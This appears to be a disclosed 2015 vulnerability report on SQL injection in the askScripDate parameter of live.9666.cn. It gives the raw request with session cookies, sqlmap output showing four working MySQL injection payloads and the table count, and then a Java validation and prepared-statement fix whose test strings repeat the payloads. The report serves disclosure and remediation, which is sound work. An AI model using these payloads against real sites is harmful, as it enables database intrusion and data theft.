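2015-09-25: Details reported to the vendor; awaiting vendor response
2015-09-25: Vendor confirmed; details disclosed to the vendor only
2015-10-05: Details disclosed to core white hats and experts in related fields
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public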
GET /scrip/findMyScrips.action?roomsInfo=&askScripDate=2015-07-20'' HTTP/1.1
Host: live.9666.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://live.9666.cn/scrip/myScrips?toolbar
Cookie: cowboy_website=c226bc22-af26-4e88-a886-80d132782618; musicStatus=on; __utma=236883550.934637685.1443167390.1443167390.1443167390.1; __utmb=236883550.11.10.1443167390; __utmc=236883550; __utmz=236883550.1443167390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; cowboy_temp=""; cowboy_login=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_user_name=asdfg; cowboy_login_imply=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_nick_name=61736466675f34354c4f4e43; cowboy_latest_login_time=1443168569; haoshengyin=1; JSESSIONID=D80ECF2572888245CD6E573022B67F0D
Connection: keep-alive
Parameter: askScripDate
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: askScripDate (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: roomsInfo=&askScripDate=-5945' OR 6307=6307#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: roomsInfo=&askScripDate=-4368' OR 1 GROUP BY CONCAT(0x7162787a71,(SELECT (CASE WHEN (1877=1877) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: roomsInfo=&askScripDate=2015-07-20''' OR SLEEP(5)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: roomsInfo=&askScripDate=2015-07-20''' UNION ALL SELECT CONCAT(0x7162787a71,0x6e4c4e70697444767670,0x71626a7171)#
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: live
[86 tables]
Parameter filtering
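For a date-typed parameter such as askScripDate, filtering means accepting only a strict yyyy-MM-dd value and passing it to MySQL as a bound parameter instead of concatenated text. The Java below is an added example, not code from the affected site; the class name, the table `scrip_ask` and the column `ask_date` are hypothetical.

```java
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.time.LocalDate;
import java.time.format.DateTimeParseException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.regex.Pattern;

public class AskScripDateFilter {
    // Shape check first: exactly four, two and two ASCII digits.
    private static final Pattern DAY = Pattern.compile("\\d{4}-\\d{2}-\\d{2}");

    /** Returns the parsed date, or empty when the raw parameter is not a real calendar day. */
    static Optional<LocalDate> parseAskScripDate(String raw) {
        if (raw == null || !DAY.matcher(raw).matches()) return Optional.empty();
        try {
            return Optional.of(LocalDate.parse(raw)); // strict ISO parse, rejects 2015-02-30
        } catch (DateTimeParseException e) {
            return Optional.empty();
        }
    }

    /** Hypothetical lookup: the value reaches MySQL as a bound DATE, never as SQL text. */
    static List<Long> findScripIds(Connection db, LocalDate day) throws SQLException {
        String sql = "SELECT id FROM scrip_ask WHERE ask_date = ?"; // hypothetical table and column
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setDate(1, Date.valueOf(day));
            try (ResultSet rs = ps.executeQuery()) {
                List<Long> ids = new ArrayList<>();
                while (rs.next()) ids.add(rs.getLong(1));
                return ids;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed sample: one valid date, the values seen in the request and sqlmap output, one impossible date.
        String[] samples = {"2015-07-20", "2015-07-20''", "-5945' OR 6307=6307#",
                            "2015-07-20''' OR SLEEP(5)#", "2015-02-30"};
        for (String s : samples) {
            System.out.println(parseAskScripDate(s).map(d -> "accept " + d).orElse("reject") + "  <-  " + s);
        }
    }
}
```

A request whose askScripDate fails `parseAskScripDate` should be answered with HTTP 400 before any query is built; `main` exercises only the validator, so it runs without a database.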
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-09-25 19:48
Thanks for the submission
None yet